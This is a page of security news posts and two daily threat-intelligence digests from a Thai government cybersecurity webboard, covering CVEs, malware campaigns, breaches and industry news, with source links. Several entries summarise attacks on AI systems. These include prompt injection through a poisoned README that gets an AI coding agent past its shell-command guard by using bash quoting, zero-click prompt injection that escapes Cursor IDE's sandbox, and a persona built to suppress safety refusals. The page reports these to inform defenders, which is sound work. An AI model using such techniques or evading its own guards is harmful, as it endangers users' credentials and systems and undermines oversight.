NCSA Webboard
    Posts created by NCSA_THAICERT

    • RustDuck botnet found attacking routers and IoT devices for use in DDoS attacks

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
    • Hackers steal the data of more than 4.38 million Aflac Japan customers after 10 days of access to its systems

      Posted in Cyber Security News
    • Researchers discover a new attack, BioShocking, that tricks AI browsers into stealing users' sensitive data

      Posted in Cyber Security News
    • CISA adds 1 exploited vulnerability to its catalog

      On 1 July 2569 B.E. (2026), the Cybersecurity and Infrastructure Security Agency (CISA) added 1 new vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence that it is being actively exploited. Details:

      CVE-2026-45659 Microsoft SharePoint Server Deserialization of Untrusted Data Vulnerability

      CISA continually updates the KEV catalog with newly confirmed vulnerabilities so that it covers the risks actually observed now and in the future.

      Reference

      https://www.cisa.gov/news-events/alerts/2026/07/01/cisa-adds-one-known-exploited-vulnerability-catalog

      Posted in Cyber Security News
    • ETDA Cyber Threat Intelligence 02 July 2026

      New Tooling

      • Nika: Open-Source Code Analysis Tool
        "Many serious security bugs in web applications sit across several files at once. Request data enters through a controller, moves through data objects and service layers, and turns dangerous only when it reaches a sensitive operation such as a database query or a file action. A scanner that reads one file at a time can miss that path entirely. Nika, an open-source tool from the payments company PhonePe, works on that problem for Java microservices. It performs cross-file taint analysis, tracing attacker-controlled input across application layers to find out whether that input reaches a security-sensitive sink."
        https://www.helpnetsecurity.com/2026/07/01/nika-open-source-code-analysis-tool/
        https://github.com/PhonePe/nika

      Vulnerabilities

      • DuneSlide: Two Critical RCE Vulnerabilities Via Zero-Click Prompt Injection In Cursor IDE
        "Cato AI Labs has discovered two critical remote code execution (RCE) vulnerabilities in Cursor IDE, the popular development environment which, according to Cursor, is used by over half of the Fortune 500. Both RCE vulnerabilities, which we refer to as “DuneSlide,” achieved a 9.8 CVSS score, and involve breaking out of the IDE’s sandbox environment and were assigned CVE IDs CVE-2026-50548 and CVE-2026-50549. Together, these vulnerabilities show how prompt injection can reach beyond the LLM layer and expose classical vulnerabilities in code paths that were not traditionally considered part of the attack surface."
        https://www.catonetworks.com/blog/duneslide-two-critical-rce-vulnerabilities/
        https://thehackernews.com/2026/07/critical-cursor-flaws-could-let-prompt.html
      • Google Patches 382 Chrome Vulnerabilities
        "Google on Tuesday announced the release of Chrome 151 with patches for 382 vulnerabilities, the vast majority of which were discovered by the tech giant itself. Of the 382 vulnerabilities, 358 were found by Google. The company has discovered and patched hundreds of Chrome flaws in recent months, a surge likely driven by AI. However, it has shared no details on which specific AI tools are driving the surge. Fifteen of the newly patched vulnerabilities have been assigned a ‘critical’ severity rating, and 67 have been rated ‘high severity’. Of the remaining flaws, 169 have a ‘medium’ and 131 have a ‘low’ severity rating."
        https://www.securityweek.com/google-patches-382-chrome-vulnerabilities/
        https://www.malwarebytes.com/blog/bugs/2026/07/chrome-needs-another-whopper-update-to-fix-382-security-fixes
      • Caught In The Octopus Trap: Unauthenticated RCE In Argo CD With CodeQL
        "Synacktiv has discovered an unauthenticated arbitrary code execution vulnerability in ArgoCD's repo-server component, potentially allowing full cluster compromise. This article explains how the vulnerability was identified using CodeQL, details the exploitation process to gain control over the underlying Kubernetes cluster, and introduces a tool for automating the attack."
        https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql
        https://thehackernews.com/2026/07/unpatched-argo-cd-repo-server-flaw.html
      • Over 900 Oracle E-Business Instances Exposed To Ongoing Attacks
        "Over 900 Oracle E-Business Suite (EBS) instances have been found exposed online amid ongoing attacks exploiting a critical security flaw. The vulnerability (tracked as CVE-2026-46817) was found in the File Transmission component of EBS's Oracle Payments product and allows malicious actors without privileges and with HTTP network access to take over vulnerable systems through low-complexity attacks. Oracle has patched this flaw with security updates released as part of its May 2026 Critical Security Patch Update and urged customers to patch their systems immediately."
        https://www.bleepingcomputer.com/news/security/over-900-oracle-e-business-instances-exposed-to-ongoing-attacks/
        https://cyberscoop.com/oracle-ebs-critical-vulnerability-exploited/
        https://securityaffairs.com/194599/security/oracle-e-business-suite-flaw-under-active-attack-950-systems-exposed.html
      • Progress Kemp LoadMaster Vulnerability Targeted (CVE-2026-8037)
        "Beginning on June 29th, 2026, eSentire’s Threat Response Unit (TRU) identified exploitation attempts targeting the critical Progress Kemp LoadMaster vulnerability CVE-2026-8037. The vulnerability was initially disclosed on June 4th and functional Proof-of-Concept (PoC) exploit code was released on June 29th. CVE-2026-8037 (CVSS: 9.8), is an OS Command Injection Remote Code Execution (RCE) vulnerability which allows an unauthenticated attacker to execute arbitrary commands on the LoadMaster appliance. As active exploitation attempts have been identified, it is critical that organizations apply the relevant security patches immediately."
        https://www.esentire.com/security-advisories/progress-kemp-loadmaster-vulnerability-targeted-cve-2026-8037
        https://thehackernews.com/2026/07/latest-progress-kemp-loadmaster-pre.html

      Malware

      • No (Bad) CAP: Inside An Ongoing LSHIY Password Spray Attack
        "Huntress is observing a massive, ongoing, automated password spray attack against Microsoft's Azure command-line interface (CLI), originating from an IPv6 address range controlled by internet infrastructure provider LSHIY LLC, AS32167. Between June 12 through June 26, the threat actor made more than 81 million login attempts against Huntress customer accounts and successfully compromised at least 78 Microsoft accounts. Last week, the number and effectiveness of the compromises surged, continuing a concerning trend in the rapid expansion of these types of attacks. Notably, many of these organizations had Conditional Access policies, but the way they were configured didn't cover the techniques used by the threat actors in this campaign."
        https://www.huntress.com/blog/lshiy-password-spray-attack
        https://thehackernews.com/2026/07/azure-cli-password-spray-hits-at-least.html
        https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-365-accounts-with-81-million-login-attempts/
        https://www.securityweek.com/massive-password-spray-campaign-targeting-azure-cli/
        https://www.bankinfosecurity.com/azure-password-spraying-attack-bypasses-mfa-defenses-a-32128
        https://securityaffairs.com/194588/uncategorized/azure-cli-targeted-in-lshiy-password-spray-campaign-across-64-orgs.html
      • Phantom Squatting: AI-Hallucinated Domains As a Software Supply Chain Vector
        "Unit 42 researchers found that large language models (LLMs) consistently hallucinate web domains for legitimate brands. Adversaries are actively weaponizing this vector by registering these nonexistent domains to intercept traffic generated by AI systems. We call this phenomenon phantom squatting, and it poses a significant risk to the software supply chain. Our proactive monitoring of registration for high-priority hallucinated domains yielded real-world detections across multiple sectors. We were able to predict use of these domains from 18–51 days ahead of adversary registration."
        https://unit42.paloaltonetworks.com/phantom-squatting-hallucinated-web-domains/
        https://thehackernews.com/2026/07/phantom-squatting-uses-ai-hallucinated.html
        https://www.darkreading.com/endpoint-security/phantom-squatting-ai-driven-supply-chain-threat
      • ClickFix: The Gift That Keeps On Giving
        "In the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and saw a 517% increase in 2025, as described by SANS; the effectiveness of this technique is something we will have to deal with for the upcoming years. Before diving into technical details, it’s important to understand why ClickFix is so effective. The attack exploits fundamental user behaviors and training:"
        https://kqlquery.com/posts/clickfix-gift-that-keeps-on-giving/
        https://thehackernews.com/2026/07/researcher-analyzes-3000-live-clickfix.html
      • SOCRadar Links FortiBleed Campaign To INC And Lynx Ransomware Operations
        "SOCRadar’s Threat Research Unit (STRU) has linked the FortiBleed credential-harvesting campaign to two active ransomware-as-a-service operations, INC Ransom and Lynx. An operator tied to FortiBleed’s infrastructure was found actively working negotiation panels for both groups, tying mass FortiGate credential theft directly to ransomware deployment for the first time."
        https://socradar.io/blog/fortibleed-inc-lynx-ransomware-link/
        https://www.bleepingcomputer.com/news/security/fortibleed-credential-theft-campaign-linked-to-lynx-ransomware/
      • Don’t Eat The ChocoPoCs! How Vulnerability Researchers Were Repeatedly Targeted By Trojanised Exploits
        "This blogpost is a collaboration between YesWeHack and Sekoia TDR, analysing an undocumented supply chain attack that targets vulnerability researchers and pentesters via lure CVE PoC repositories. Our analysis shows that this vector has already been used in malicious PoCs, seeking to compromise pentesting tools, since late 2025. Because the malware and its C2 infrastructure are still active, we strongly advise against running any of the PoCs code or installing the malicious packages."
        https://www.sekoia.com/blog/dont-eat-the-chocopocs-how-vulnerability-researchers-were-repeatedly-targeted-by-trojanised-exploits
        https://www.bleepingcomputer.com/news/security/new-chocopoc-malware-targets-researchers-via-trojanized-poc-exploits/
      • When AI Invents The Attack: Browser-Native Ransomware
        "Check Point Research recently uncovered something that changes how we think about AI-assisted threats: a malware sample in which an AI model independently connected a theoretical browser risk to a working ransomware technique, with no exploit, no app installation, and no technical expertise required from the attacker."
        https://blog.checkpoint.com/research/when-ai-invents-the-attack-browser-native-ransomware/
        https://research.checkpoint.com/2026/browser-only-ransomware-from-llm-hallucinations-to-a-practical-attack-technique/
        https://thehackernews.com/2026/07/ai-generated-browser-ransomware-abuses.html
        https://www.theregister.com/security/2026/07/01/somebody-told-deepseek-to-build-in-browser-ransomware-and-it-gleefully-complied/5265311
      • ARToken: Inside An EvilTokens Affiliate Panel Targeting Microsoft 365
        "Cisco Talos identified a fully-featured phishing-as-a-service (PhaaS) operator panel, branded "ARToken," that shares infrastructure, API contracts, and operational patterns with the EvilTokens platform documented by Sekoia and Microsoft in early 2026. The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token (PRT) persistence, email access, business email compromise (BEC) operations, and SharePoint exfiltration — all accessible to operators through a React-based dashboard."
        https://blog.talosintelligence.com/artoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365/
        https://cyberscoop.com/artoken-bec-platform-cisco-talos/
        https://www.theregister.com/cyber-crime/2026/07/01/eviltokens-device-code-phishing-kit-totally-more-evil-than-we-all-thought/5265409
        https://www.helpnetsecurity.com/2026/07/01/artoken-phishing-panel-microsoft-365-accounts/
      • Analysis Of Ongoing Ousaban Attacks Targeting The Iberian Peninsula
        "In May 2026, FortiGuard Labs identified an attack targeting users in Spain and Portugal involving the banking Trojan Ousaban. This malware has been active in Brazil and is spread through an MSI downloader. The malicious payload involves a DLL file that is run via DLL side-loading or process injection. In this campaign, the threat actor primarily targets users in Spain and Portugal. Figure 1 shows how the attack unfolds. The phishing PDF tricks victims into visiting a malicious webpage that scans the user's environment. If they are in Spain or Portugal, the webpage downloads a VBS file to kickstart the next part of the attack. The final payload is an EXE file that is dropped onto the victim’s computer and executed by the VBS script."
        https://www.fortinet.com/blog/threat-research/analysis-of-ongoing-ousaban-attacks-targeting-the-iberian-peninsula
        https://thehackernews.com/2026/07/ousaban-banking-trojan-targets-iberian.html
        https://www.infosecurity-magazine.com/news/ousaban-banking-trojan-spain/
      • Phishing In The Balkans: Fake Traffic Fines, Real Losses
        "Government services are increasingly relying on SMS as a channel to send notifications such as fines, toll reminders and payment alerts. It is fast, convenient, and the general public tends to trust a text from an official sender. This trust is what scammers are looking to take advantage of. Group-IB researchers have been tracking a smishing campaign that is impersonating the identity of Putevi Srbije, Serbia’s state road authority. Victims get a text claiming they have an unpaid traffic fine. They click a link. They land on a fake government website that looks real enough to fool most people. They enter their card details. And then the money is gone."
        https://www.group-ib.com/blog/balkans-fake-traffic-fines-phishing/
      • Fake Interpol Investigation Emails Target Small Businesses With Ransomware
        "Think your small business is too small to be targeted by ransomware? That's precisely the assumption cybercriminals hope you'll make. Bitdefender Antispam researchers have uncovered a phishing campaign targeting small businesses across Europe, Asia, the Middle East, and the United States with fake investigation emails impersonating law enforcement officials. The messages claim to contain evidence of suspicious company activity, but there’s a catch: The attached ‘evidence’ is actually ransomware."
        https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-interpol-emails-serve-ransomware
        https://hackread.com/fake-interpol-investigation-emails-ransomware-small-businesses/
      • The SOC Files: ScreenConnect Masked As Freeware. An Inside Look At a Large-Scale Campaign
        "To access compromised systems, threat actors frequently abuse legitimate remote monitoring tools. At first glance, these utilities rarely raise red flags: they are signed with valid digital certificates, often allowlisted under corporate IT policies, and fully supported by OS vendors. However, they grant attackers the ability to harvest data from target devices, drop malware, and move laterally across the network."
        https://securelist.com/tr/the-soc-files-screenconnect-campaign-with-asyncrat/120472/
        https://thehackernews.com/2026/07/seo-poisoned-software-sites-abuse.html
      • Veil#Drop: Blogspot-Hosted PowerShell Loader Delivers PureLog Stealer Through XOR-Encoded In-Memory .NET Payloads
        "Veil#Drop is a sophisticated multi-stage malware delivery framework that combines social engineering, compromised websites, malicious JavaScript launchers, PowerShell download cradles, and trusted cloud-hosted infrastructure to deploy PureLog Stealer entirely in memory. The infection chain begins with a deceptively named JavaScript file masquerading as a document (e.g., transcript.pdf.js), which executes through Windows Script Host and launches PowerShell with execution policy bypasses enabled. PowerShell then retrieves additional stages from attacker-controlled Blogspot pages, abusing Google’s trusted infrastructure to blend malicious traffic with legitimate web activity and evade reputation-based security controls."
        https://www.securonix.com/blog/veildrop-blogspot-hosted-powershell-loader/
        https://thehackernews.com/2026/07/veildrop-malware-chain-uses-blogger.html
        https://www.infosecurity-magazine.com/news/veil-drop-blogspot-purelog-stealer/
      • UNC1151 Phishing Email Targeting Belarusian Politician Points To Multi-National Campaign
        "UNC1151, also referred to as Ghostwriter and various other names, is a threat actor whose interests align with those of the government of Belarus (and, by extension, Russia, due to Russia and Belarus’s frequently aligned interests). The group first rose to prominence in 2020 when it hacked into legitimate media sites to publish fake stories (which earned it the name ‘Ghostwriter’). Since then it has remained very active, mostly in spear-phishing campaigns targeting individuals in Poland and Ukraine."
        https://censys.com/blog/unc1151-phishing-email-campaign/

      Breaches/Hacks/Leaks

      • Kubota Says Hackers Had Month-Long Access To Network Systems
        "Kubota North America Corporation disclosed that hackers had access to some of its network systems for more than a month earlier this year. Following an investigation into the incident, the company determined that between March 16 and April 20 the threat actor accessed files with personal information for employees and their dependents. Kubota is a Japanese industrial manufacturer known for its agricultural and construction equipment. It operates in 120 countries, employs more than 52,000 people, and has a reported annual revenue of $20 billion."
        https://www.bleepingcomputer.com/news/security/kubota-says-hackers-had-month-long-access-to-network-systems/
      • Hackers Breached DHS Information-Sharing Network, People Familiar Say
        "A key Department of Homeland Security information-sharing database was accessed by an unknown threat actor in recent weeks, potentially exposing sensitive data exchanged between federal, state, local and industry partners, according to two people familiar with the matter. DHS investigators are probing the intrusion of the Homeland Security Information Network, said both people, who spoke on the condition of anonymity because the incident is sensitive. The hackers’ affiliation and whether any documentation was pilfered from the system are both unclear."
        https://www.nextgov.com/cybersecurity/2026/06/hackers-breached-dhs-information-sharing-network-people-familiar-say/414534/
        https://www.bleepingcomputer.com/news/security/dhs-confirms-hackers-breached-hsin-info-sharing-platform/

      General News

      • What a Financial Planner Taught Me About Cybersecurity
        "When I spoke at a recent cybersecurity awareness event for financial planners and tax advisors, the audience really engaged with the subject. As happens at conferences the world over, people often come up to speakers to ask follow-up questions, or just give their feedback about points made during the presentation. This time, it struck me how many of them said they had been scared by what they heard during my talk."
        https://www.helpnetsecurity.com/2026/07/01/raising-cybersecurity-awareness-for-non-experts/
      • This Supercomputer Encrypts Your Data Even While It’s Running It
        "Most people who handle sensitive data already encrypt it in two places. They lock it down when it sits on a hard drive, and they lock it down when it moves across a network. There has always been a third moment that stayed open. The instant a computer pulls that data into memory to work on it, the protection drops away. For a few seconds or a few hours, the information sits in the open, readable by anyone with deep enough access to the machine. A research team at the University of Cologne built a supercomputer that closes that gap. The system is called RAMSES, and it keeps data scrambled even during the moment of processing."
        https://www.helpnetsecurity.com/2026/07/01/confidential-computing-hpc-research/
        https://arxiv.org/pdf/2606.27919
      • AI-Generated Code Risks Reach Security, Legal, And Compliance Teams
        "Most engineering organizations write code with AI, and a good number of them keep that code away from customers. A Flux survey of engineering leaders and practitioners found that nearly half run AI-generated code in production. Almost every company in the sample uses AI somewhere in development, with under 5% reporting no plans to adopt it within a year. Teams reach for AI on repetitive work first. It writes documentation, fills out unit tests, and handles simple functions, the kind of tasks where a mistake stays small and easy to catch. Adoption thins out as the stakes rise."
        https://www.helpnetsecurity.com/2026/07/01/ai-generated-code-risks-security/
      • The Near Real-Time Patching Era Has Arrived
        "Cybersecurity teams need to prepare now for a forthcoming onslaught of vulnerabilities that will need to be remediated much faster than ever before. The number of vulnerabilities being discovered and reported has already been steadily increasing over the last few months. However, with further advances in artificial intelligence (AI), most notably in the form of Mythos and ChatGPT 5.6 models from Anthropic and OpenAI, the overall number of vulnerabilities is only going to increase. Right now, however, not all the vulnerabilities being remediated lately have actually been formally reported, so limited access to the latest AI models might be working in favor of cybersecurity teams."
        https://blog.barracuda.com/2026/06/30/near-real-time-patching-ai-application-security
      • The Platform You Trust Is The Platform They Target
        "Cofense Intelligence is observing a clear shift in phishing operations: threat actors are moving beyond broad, one-size-fits-all campaigns and adopting platform-aware delivery that adapts to the victim’s device, browser, and environment. What began as simple Windows-focused malware distribution campaigns has evolved into more sophisticated campaigns that can selectively deliver credential phishing, remote access tools, or malware across Windows, MacOS, and Android. This trend reflects a broader strategic change in the threat landscape, one that is designed to increase the likelihood of compromise, expand target coverage, and improve threat actor return on investment."
        https://cofense.com/blog/the-platform-you-trust-is-the-platform-they-target
        https://www.darkreading.com/application-security/phishing-campaigns-auto-adapt-victims-device-os
      • OpenClaw: Risks For The Users And How To Mitigate Them
        "OpenClaw, which was previously known as Clawdbot and Moltbot, is today one of the most successful and fast‑growing ecosystems for AI agents, recognized worldwide. The project quickly became popular with users because of its flexibility and ability to solve fairly complex tasks that previously required a lot of time for automation and execution. A dedicated marketplace appeared quickly after the project started gaining traction, where developers and users began publishing tools that integrate with OpenClaw. Currently, employees all over the world use OpenClaw to automate their tasks, often unaware of risks this practice introduces to them and their employers."
        https://securelist.com/openclaw-security/120484/
      • Alleged Member Of Criminal Cyber Hacking Group “Scattered Spider” Arrested In Finland And Extradited To The United States
        "An alleged member of the criminal cyber hacking group Scattered Spider has been arrested in Finland and extradited to the United States to face federal criminal conspiracy charges in the Northern District of Illinois. A criminal complaint unsealed Tuesday charges Peter Stokes, 19, a dual citizen of the United States and Estonia, with conspiracy, computer intrusion, and fraud. Stokes was arrested by Finnish authorities in April pursuant to an Interpol Red Notice and extradited to the United States last week. He made an initial appearance on Tuesday in federal court in Chicago and was ordered to remain in law enforcement custody."
        https://www.justice.gov/opa/pr/alleged-member-criminal-cyber-hacking-group-scattered-spider-arrested-finland-and-extradited
        https://thehackernews.com/2026/07/19-year-old-scattered-spider-suspect.html
        https://therecord.media/teen-suspect-in-scattered-spider-hacks-extradited-to-us
      • Huntress CEO Says Threat Hunter Used 'Poor Judgment' In Alerting Ransomware Crim About Law Enforcement Probe
        "Huntress CEO Kyle Hanslovan said he is aware of “questionable, long-term threat actor communications” between a threat hunter who is still employed with the security firm and a cybercriminal, and called this “poor judgment.” “In one particular exchange, our current teammate disclosed to a threat actor that law enforcement had reached out to them about the threat actor,” Hanslovan said in a blog post, addressing a former employee’s accusations that the current Huntress analyst is an insider threat to the company. “While this disclosure was not illegal, it reflected poor judgment,” he wrote."
        https://www.theregister.com/security/2026/06/30/huntress-ceo-says-threat-hunter-used-poor-judgment-in-alerting-ransomware-crim-about-law-enforcement-probe/5264532

      Reference

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
    • Attacks exploiting a SimpleHelp RMM vulnerability found installing Djinn Stealer to steal sensitive data

      Posted in Cyber Security News
    • Nissan reports an employee data leak linked to exploitation of a zero-day vulnerability in Oracle PeopleSoft

      Posted in Cyber Security News
    • Fake Chrome extension impersonating Perplexity AI found intercepting users' search queries and keystrokes

      Posted in Cyber Security News
    • ETDA Cyber Threat Intelligence 01 July 2026

      Healthcare Sector

      • OFFIS DCMTK Toolkit
        "Successful exploitation of these vulnerabilities could allow an attacker to write files, access unauthorized information, exhaust memory, or crash affected DCMTK client or server processes."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01
        https://www.bankinfosecurity.com/dicom-toolkit-bugs-raise-medical-imaging-security-risks-a-32114

      Industrial Sector

      • StoneFly Storage Concentrator
        "Successful exploitation of these vulnerabilities could allow attackers to gain broad unauthorized access, execute arbitrary commands with root privileges, steal sensitive data, and perform actions on behalf of legitimate users across interconnected systems."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06
      • Delta Electronics DVP12SE PLC
        "Successful exploitation of these vulnerabilities could allow an attacker to remotely issue commands, modify operational values, interfere with control logic, and alter device behavior without authentication or privilege enforcement."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-07
      • Mitsubishi Electric MELSOFT Update Manager SW1DND-UDM-M
        "Successful exploitation of these vulnerabilities could allow a local attacker to tamper with or destroy information in the affected product, cause a denial-of-service condition in the affected product, or execute arbitrary code when a specially crafted archive file is decompressed by the 7-Zip component included in MELSOFT Update Manager."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-01
      • Frangoteam FUXA SCADA/HMI
        "Successful exploitation of this vulnerability could allow an unauthenticated remote attacker to enumerate all user accounts and role assignments on a FUXA SCADA/HMI instance."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02
      • Schneider Electric EcoStruxure IT Data Center Expert
        "Schneider Electric is aware of a vulnerability in its EcoStruxure™ IT Data Center Expert. The EcoStruxure™ IT Data Center Expert product is a scalable monitoring software that collects, organizes, and distributes critical device information providing a comprehensive view of equipment. Failure to apply the remediation provided below may risk information disclosure."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-03
      • Schneider Electric EasyLogic T150 And Saitel DP RTU
        "Successful exploitation of these vulnerabilities can allow an attacker to cause unauthorized access and exposure of sensitive information when the unauthenticated attacker accesses credentials stored within firmware or system files."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-04
      • XZ Utils Vulnerability Impacting B&R Products
        "An update is available that resolves a vulnerability in the product versions listed as affected in the advisory. An attacker who successfully exploited this vulnerability could cause the product to stop or corrupt memory data."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-05

      Vulnerabilities

      • Enterprise Tech In, Shell Out (Progress Kemp LoadMaster Uninitialized Heap To Pre-Auth RCE CVE-2026-8037)
        "Welcome back to another watchTowr Labs blog post. This time, we're looking at Progress Kemp LoadMaster, a load balancer that sits at the edge of a lot of enterprise networks. Edge appliances have a habit of becoming the way in rather than the thing keeping people out, and CVE-2026-8037 keeps that streak alive: a pre-authentication Remote Code Execution vulnerability accessible to anyone who can access the API. So, in probably a predictable turn of events, we're back doing what we do best."
        https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/
        https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html
      • Adobe Security Bulletin
        "Adobe has released security updates for ColdFusion versions 2025 and 2023. These updates resolves critical and important vulnerabilities that could lead to arbitrary code execution, privilege escalation, arbitrary file system read, and security feature bypass. Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates."
        https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html
      • Citrix Patches a New NetScaler Flaw With Echoes Of CitrixBleed
        "Citrix published a security bulletin Tuesday disclosing six vulnerabilities in NetScaler ADC and NetScaler Gateway appliances, including a high-severity memory disclosure flaw that researchers say belongs to a vulnerability class first identified in the 2023 incident known as CitrixBleed. The company rated the overall bulletin severity as high and assigned CVSS scores ranging from 6.9 to 8.8 across the six CVEs. Citrix said customers should install the updated builds and, in one case, manually adjust a configuration parameter even after patching."
        https://cyberscoop.com/citrix-netscaler-flaw-cve-2026-8451-citrixbleed/
        https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696604
      • CISA: Windows BlueHammer Flaw Now Exploited By Ransomware Gangs
        "CISA confirmed on Monday that ransomware gangs have begun exploiting a high-severity Microsoft Defender privilege escalation vulnerability that has previously been abused in zero-day attacks. Dubbed BlueHammer, the security flaw (CVE-2026-33825) was leaked by a security researcher known as "Nightmare Eclipse" in early April, together with proof-of-concept exploit code, in protest at how the Microsoft Security Response Center (MSRC) handles the disclosure process. "Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally," Microsoft explains in a security advisory."
        https://www.bleepingcomputer.com/news/security/cisa-windows-bluehammer-flaw-now-exploited-by-ransomware-gangs/
        https://www.securityweek.com/bluehammer-vulnerability-exploited-in-ransomware-attacks/
      • AirDrop And Quick Share Flaws Let Nearby Attackers Trigger Crashes And Bypass Checks
        "Two researchers have found six security flaws in AirDrop and Quick Share, the wireless features that beam files between nearby devices with no cables or shared network. An attacker within wireless range, with just a laptop and no prior connection, can crash the sharing service on a Mac or iPhone set to receive from anyone, with no tap or prompt. The same research found Quick Share flaws that bypass Samsung's session checks and trigger a potentially exploitable crash in Google's Windows app."
        https://thehackernews.com/2026/06/airdrop-and-quick-share-flaws-let.html
        https://www.helpnetsecurity.com/2026/06/30/apple-airdrop-google-samsung-quick-share-vulnerabilities/
      • Apple Patches 30+ iOS, MacOS, Safari Flaws, Including AI-Discovered WebKit Bugs
        "Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security."
        https://thehackernews.com/2026/06/apple-patches-30-ios-macos-safari-flaws.html
        https://support.apple.com/en-us/100100
        https://securityaffairs.com/194476/security/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools.html
        https://www.malwarebytes.com/blog/news/2026/06/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari
      • GuardFall: a Universal Shell Injection Vulnerability In Open-Source AI Agents
        "AI coding agents and computer use agents run shell commands with your full account authority: your SSH keys, your cloud credentials, everything in $HOME. Most of them gate that power behind a guard that matches the command string against a list of dangerous patterns. But the string being inspected is different from the command executed. A guard inspects raw text, while system shell (bash) expands, unquotes, and rewrites text before running it. So, when an agent processes untrusted content (for example, an npm package with a poisoned README), the prompt injection can make it run a command that passes all the execution filters. This tactic is not new. It’s a decades-old shell quoting bypass, well known in the security literature. It succeeds against today’s most-used open-source agents. We first met this in the open-source NousResearch/hermes-agent project and surveyed ten others against the same bypass class."
        https://adversa.ai/blog/opensource-ai-coding-agents-shell-injection-vulnerability/
        https://thehackernews.com/2026/06/guardfall-exposes-open-source-ai-coding.html
        https://www.securityweek.com/decades-old-bash-tricks-expose-ai-coding-agents-to-supply-chain-attacks/

      Malware

      • How Ransomware Syndicates Weaponize Corporate-Style Organization
        "Similar to the events that unfolded with the Conti ransomware group’s demise in 2022, leaked internal chat logs of the Black Basta cybercrime group last year gave us a peek behind the curtain of modern ransomware operations. We found that these groups have continued to evolve into highly sophisticated and organized syndicates, taking a corporate-style approach to extortion. According to our analysis, Black Basta members carefully studied victims to launch advanced phishing and malware campaigns, exploit vulnerabilities and intimidate victims into paying via panic-triggering tactics."
        https://cyberscoop.com/ransomware-syndicates-corporate-organization-op-ed/
      • Operation Navy Ghost: How Attackers Planted a Telegram-Powered Backdoor Across Fake Pyrogram Packages On PyPI
        "A threat actor targeted Telegram bot developers adopting the popular ‘pyrogram’ package on PyPI over the course of six months starting November 2025, in Operation Navy Ghost. This malware is a complete backdoor on servers where infected bots are operated, and uses Telegram itself for C2 and data exfiltration. Learn how it works, how it sneaks by most scanners, and how to detect infections."
        https://checkmarx.com/zero-post/operation-navy-ghost-pyrogram-telegram-supplychain-attack/
        https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-give-hackers-control-of-telegram-bot-servers/
      • The Bear Necessities: A Look At The Drivers, Dynamics, And Applications Of The Pro-Russia Influence Ecosystem
        "Four years into Russia’s full-scale invasion of Ukraine, the pro-Russia influence ecosystem has evolved from a tool of war back into a global strategic asset. Since the mobilization of this ecosystem to support frontline objectives, we have witnessed the expedited development of new influence assets linked to multiple, expansive, covert information operations (IO) campaigns and a revitalization of pro-Russia hacktivism at an unprecedented scale. While this threat activity initially adapted to encompass Ukraine-related priorities, it is gradually pivoting back to established Russian influence objectives for which the ecosystem was originally honed."
        https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-influence-ecosystem
        https://www.bankinfosecurity.com/google-kremlin-expands-ai-backed-campaigns-across-europe-us-a-32120
      • Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App
        "Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats."
        https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/
      • Bring Your Own Agent: Hijacking Exposed AI Backends To Power Offensive Operations
        "Some abuse of an internet-exposed AI server can be mundane: someone finds free inference and runs a chatbot on your bill. The cases below are different. Between March and May 2026, our honeypot sensors caught three separate operators hijacking our exposed Ollama and LiteLLM endpoints as the model backend for offensive tooling. Two were autonomous penetration-testing frameworks ("Strix" and "HexStrike AI"), and the third was an OpenAI Codex agent carrying a persona built to suppress safety refusals and assisting in web reverse-engineering work."
        https://labs.zenity.io/p/bring-your-own-agent-hijacking-exposed-ai-backends-to-power-offensive-operations
        https://www.darkreading.com/cloud-security/attackers-hijack-exposed-ai-endpoints-power-offensive-ops
      • New EvilTokens Attack Exposes Browser Visibility Gap In Enterprise SOCs
        "A new EvilTokens attack shows how modern phishing can hide critical evidence from enterprise SOCs until the page runs inside the browser. The case highlights a growing visibility gap in phishing triage: suspicious URLs may appear incomplete at first, while the real account takeover flow is revealed only after execution. For security leaders, that gap can mean slower investigations, delayed response, and higher business risk."
        https://hackread.com/eviltokens-attack-browser-visibility-gap-enterprise-socs/
      • ToddyCat: Your Hidden Email Assistant. Part 2
        "We continue to share details on the malicious techniques and toolsets used by the ToddyCat APT group. In the first part of this report, we examined the group’s attacks aimed at stealing data from browsers, as well as from local and cloud email services. The methods used in that campaign indicated that ToddyCat was attempting to access corporate correspondence while evading monitoring tools. However, all of the group’s methods we described previously are effectively detected by EPP and EDR solutions."
